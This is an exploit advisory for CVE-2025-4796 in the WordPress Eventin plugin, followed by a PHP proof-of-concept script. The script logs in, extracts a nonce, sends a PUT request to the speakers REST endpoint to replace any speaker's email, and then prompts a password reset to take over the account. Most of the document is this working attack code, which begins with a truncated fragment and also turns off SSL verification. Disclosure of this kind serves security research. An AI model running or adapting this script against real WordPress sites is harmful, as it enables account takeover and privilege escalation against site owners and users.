============================================================================================================================================= | # Title : WordPress Eventin 4.0.34 Account Takeover Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://wordpress.org/plugins/wp-event-solution/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/210929/ & CVE-2025-4796 [+] Summary : A critical vulnerability exists in the Speaker Management component of the target where an authenticated attacker can intercept the speaker update process and change any speaker’s registered email address without proper authorization. This flaw allows the attacker to hijack arbitrary accounts by modifying the email field and subsequently triggering a password reset workflow. The flaw is caused by insufficient authorization checks on the update_speaker endpoint combined with predictable nonce retrieval. [+] Affected Versions ---------------------------------------- All tested versions are confirmed vulnerable. Vendor has not released a fix at the time of publishing. [+] Vulnerability Details ---------------------------------------- The update_speaker.php endpoint accepts multiple fields including speaker_id and email without verifying that the user performing the action is authorized to update the target record. Additionally, the anti-CSRF nonce can be extracted by any authenticated user, making cross-user actions possible. Impact: - Account takeover - Unauthorized email modification - Privilege escalation - Full speaker profile compromise [+] Usage ---------- Save the file: poc.php Run: php poc.php https://target-site.com new@mail.com 12 admin 123456 [+] Poc getMessage() . PHP_EOL; } } /* --------------------------- URL VALIDATION ---------------------------- */ function Nxploited_validate_url($url) { if (!preg_match('/^https?:\/\//i', $url)) { $url = "http://" . $url; } return rtrim($url, "/"); } /* --------------------------- EMAIL VALIDATION ---------------------------- */ function Nxploited_validate_email($email) { return filter_var($email, FILTER_VALIDATE_EMAIL); } /* --------------------------- DISABLE SSL WARNINGS ---------------------------- */ function Nxploited_disable_ssl(&$ch) { curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); } /* --------------------------- LOGIN FUNCTION ---------------------------- */ function Nxploited_login($url, $username, $password, $user_agent) { Nxploited_safe_print("[*] إرسال طلب تسجيل الدخول ..."); usleep(500000); // 0.5 ثانية (بديل sleep الممنوع) $login_url = $url . "/wp-login.php"; $data = http_build_query([ 'log' => $username, 'pwd' => $password, 'rememberme' => 'forever', 'wp-submit' => 'Log In' ]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $login_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); Nxploited_disable_ssl($ch); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt"); $response = curl_exec($ch); $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $headers = substr($response, 0, $header_size); curl_close($ch); preg_match_all('/Set-Cookie:\s*([^;]+);/i', $headers, $m); $cookies = $m[1]; foreach ($cookies as $c) { if (strpos($c, "wordpress_logged_in") !== false) { Nxploited_safe_print("[+] تسجيل الدخول ناجح."); return true; } } Nxploited_safe_print("[-] فشل تسجيل الدخول."); exit(1); } /* --------------------------- NONCE EXTRACTION ---------------------------- */ function Nxploited_extract_nonce($url, $user_agent) { Nxploited_safe_print("[*] استخراج Nonce ..."); usleep(600000); $admin_url = $url . "/wp-admin/post-new.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $admin_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt"); Nxploited_disable_ssl($ch); $resp = curl_exec($ch); curl_close($ch); if (preg_match('/createNonceMiddleware\(\s*"([a-zA-Z0-9]+)"/', $resp, $m)) { Nxploited_safe_print("[+] Nonce: " . $m[1]); return $m[1]; } Nxploited_safe_print("[-] فشل استخراج Nonce."); exit(1); } /* --------------------------- UPDATE SPEAKER ---------------------------- */ function Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent) { Nxploited_safe_print("[*] تحديث بيانات المتحدث ..."); usleep(600000); $api_url = $url . "/wp-json/eventin/v2/speakers/" . $speaker_id; $payload = json_encode(["email" => $email], JSON_UNESCAPED_UNICODE); $headers = [ "Content-Type: application/json", "X-WP-Nonce: $nonce", "User-Agent: $user_agent", "Cookie: " . trim(file_get_contents("cookies.txt")) ]; $ch = curl_init($api_url); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT"); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); Nxploited_disable_ssl($ch); $resp = curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); $json = json_decode($resp, true); if ($code === 200 && isset($json["email"])) { Nxploited_safe_print("[+] تم تحديث البريد إلى: $email"); return true; } Nxploited_safe_print("[-] فشل التحديث!"); print_r($json); exit(1); } /* --------------------------- SUCCESS BANNER ---------------------------- */ function Nxploited_custom_success($speaker_id, $email) { Nxploited_safe_print("\n=============================="); Nxploited_safe_print(" Exploitation Completed"); Nxploited_safe_print("=============================="); Nxploited_safe_print("Speaker ID : $speaker_id"); Nxploited_safe_print("Email : $email"); Nxploited_safe_print("Please reset your password using the new email.\n"); } /* --------------------------- MAIN ---------------------------- */ $url = Nxploited_validate_url($argv[1]); $email = $argv[2]; $speaker_id = $argv[3]; $username = $argv[4]; $password = $argv[5]; $user_agent = "Mozilla/5.0 (Indoushka PoC)"; if (!Nxploited_validate_email($email)) { Nxploited_safe_print("[-] البريد غير صالح."); exit(1); } Nxploited_login($url, $username, $password, $user_agent); $nonce = Nxploited_extract_nonce($url, $user_agent); Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent); Nxploited_custom_success($speaker_id, $email); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================